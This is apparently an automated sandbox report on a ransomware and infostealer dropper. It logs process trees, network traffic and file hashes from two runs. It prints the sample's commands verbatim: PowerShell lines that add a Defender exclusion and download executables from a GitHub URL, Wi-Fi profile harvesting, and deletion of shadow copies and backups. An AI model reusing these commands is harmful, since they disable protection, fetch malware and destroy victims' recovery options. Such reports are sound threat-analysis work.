PID 1880 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 1880 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\build.exe
PID 1880 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1880 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1880 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kernelv.exe
PID 1880 wrote to memory of 4772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1880 wrote to memory of 4772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2496 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 4968 wrote to memory of 2280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4968 wrote to memory of 2280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4968 wrote to memory of 2280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 4968 wrote to memory of 4652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4968 wrote to memory of 4652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4968 wrote to memory of 4652 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4968 wrote to memory of 4712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4968 wrote to memory of 4712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4968 wrote to memory of 4712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2496 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\kernelv.exe C:\Windows\SysWOW64\cmd.exe
PID 1936 wrote to memory of 4064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1936 wrote to memory of 4064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1936 wrote to memory of 4064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1936 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1936 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1936 wrote to memory of 1740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 5040 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 5040 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\build.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 4472 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 4472 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 4300 wrote to memory of 4940 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4300 wrote to memory of 4940 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4300 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4300 wrote to memory of 3240 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4472 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 4472 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 2060 wrote to memory of 4384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2060 wrote to memory of 4384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2060 wrote to memory of 3148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2060 wrote to memory of 3148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4472 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 4472 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\System32\cmd.exe
PID 4556 wrote to memory of 1556 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 4556 wrote to memory of 1556 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 4472 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\NOTEPAD.EXE
PID 4472 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Windows\system32\NOTEPAD.EXE

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\67E2.tmp\67E3.tmp\67E4.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2496 -ip 2496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 2432

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp

Files

memory/3920-0-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\67E2.tmp\67E3.tmp\67E4.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512 a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

memory/4688-3-0x00007FFC06E83000-0x00007FFC06E85000-memory.dmp

memory/4688-6-0x000001CE19060000-0x000001CE19082000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l0b0o33a.wm5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4688-14-0x00007FFC06E80000-0x00007FFC07941000-memory.dmp

memory/4688-15-0x00007FFC06E80000-0x00007FFC07941000-memory.dmp

memory/4688-18-0x00007FFC06E80000-0x00007FFC07941000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dc1d0291bbd8e80c9703fb1f4b4d14dc
SHA1 084009b8f1e67e03c9b7333293fbc00d3617948e
SHA256 4a51e06db1301abc4ee1789a9b15be257835194db4bf1830ea1275e4fdebe78a
SHA512 75672017d7b8eecd07b7cef153c1c2f3d8660f36fe312b0fd2b58f5e2d36945d6406a42b85158e7a721a7b859a3d4e52dc4988cf4f02e429da44f59df691a311

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c1ed4584aeddcadca45a2777d486240
SHA1 68c6583958d004514e91c5682403c671d51cbf50
SHA256 e2d2f0775a51d3dcfd7f9c1ef88134cbf1ce9b4832a3f37ffc152cbd5f2b4dd7
SHA512 54c122234ec3dabe16635905fe13d8ba20544e0fb90ca12821a2b1e83e01678c5e6204dbaf7ccd6c7d589429898bf8aa2b0ee861cb0fc7b86abd5e09b70e9b10

memory/4200-44-0x0000020F78CD0000-0x0000020F78EEC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 7605fb5c749eeea0b1b27fdaad78051c
SHA1 28388bf016af085bbcbacf8c516853942f6ec8d3
SHA256 466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA512 1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

memory/5040-48-0x00000000005F0000-0x0000000000618000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

MD5 b6054dbe4ed853c2e35291f045a632ba
SHA1 1355fbe1ea1f6bb566921f04512f78590c4b0e41
SHA256 b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4
SHA512 648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59583cecd69c4401d92a7a17a16f194b
SHA1 6134e6c5ec66c755f1537dd984c66b293a207a46
SHA256 b3804330d219ae8b7ab3c7b36329b611f8e2c69e90fc86d77760b18d8428f6a6
SHA512 084a905d9543be8af45126ff5bd40db819f7cddee9db7618eb42c1229145b944ebd8c61696ac7ec617bd0e55152931bf964b6af01018e9bfce964b4e16121e32

memory/2496-62-0x0000000000750000-0x000000000078C000-memory.dmp

memory/2496-64-0x00000000050A0000-0x00000000050B2000-memory.dmp

memory/3920-66-0x0000000140000000-0x0000000140028000-memory.dmp

memory/2496-67-0x0000000005290000-0x0000000005452000-memory.dmp

memory/2496-68-0x0000000006210000-0x000000000673C000-memory.dmp

memory/2496-69-0x0000000006AC0000-0x0000000006B26000-memory.dmp

memory/2496-70-0x0000000006E20000-0x0000000006EB2000-memory.dmp

C:\Users\Admin\readme.txt

MD5 60d646f40556d78166ad8111d850fc51
SHA1 babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256 a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA512 3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

MD5 d1457b72c3fb323a2671125aef3eab5d
SHA1 5bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA256 8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512 ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

MD5 28d7fcc2b910da5e67ebb99451a5f598
SHA1 a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA256 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA512 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

MD5 ea511fc534efd031f852fcf490b76104
SHA1 573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256 e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512 f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

MD5 da9e5af971dea001192305c552ae6bb5
SHA1 05e0b0c0eb8b6583794c9ceab6776e71927bdd01
SHA256 d5c616a536223591a52baced5937a0ffeb542a8569d070e0b8de5d2e59c1d6dc
SHA512 f74999734ad61dea3049cf8b3e467ea856915941753b1b51a3d9bf548b33ccdcf357e2b2c2d71e650389bfc20827e733194f317ca95d43ea94a4d3e6ede291c2

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-22 02:40

Reported

2025-03-22 02:43

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Ignore Process Interrupts

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2280 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe C:\Windows\system32\cmd.exe
PID 1072 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1072 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1072 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2964 wrote to memory of 2692 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2964 wrote to memory of 2692 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2964 wrote to memory of 2692 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1072 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe

"C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

Network

N/A

Files

memory/2280-0-0x0000000140000000-0x0000000140028000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat

MD5 1c935ef28fdfd394b770d945d7f04d76
SHA1 29e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256 aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512 a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

memory/2228-7-0x000007FEF553E000-0x000007FEF553F000-memory.dmp

memory/2228-8-0x000000001B570000-0x000000001B852000-memory.dmp

memory/2228-9-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

memory/2228-10-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

memory/2228-11-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

memory/2228-12-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

memory/2228-13-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

memory/2228-15-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

memory/2228-14-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fe5f201dd0f9a8151fa364aea81014fd
SHA1 c367b7eb2dd29016eb555cc5985a4c320e06bbdf
SHA256 b18e13a950f0a58b6acf293ab5f8528e7106253ba81a100ceeca062c3797a980
SHA512 60eb5d358b318e1c7e44c82aa501e767cd45a3010f704604377f9909be3d8b95fcde56297fb8e20793fe10609b79c5a5ee5d9cc3f588b85239a70ddc59842aac

memory/2892-21-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/2892-22-0x0000000002870000-0x0000000002878000-memory.dmp

memory/2280-28-0x0000000140000000-0x0000000140028000-memory.dmp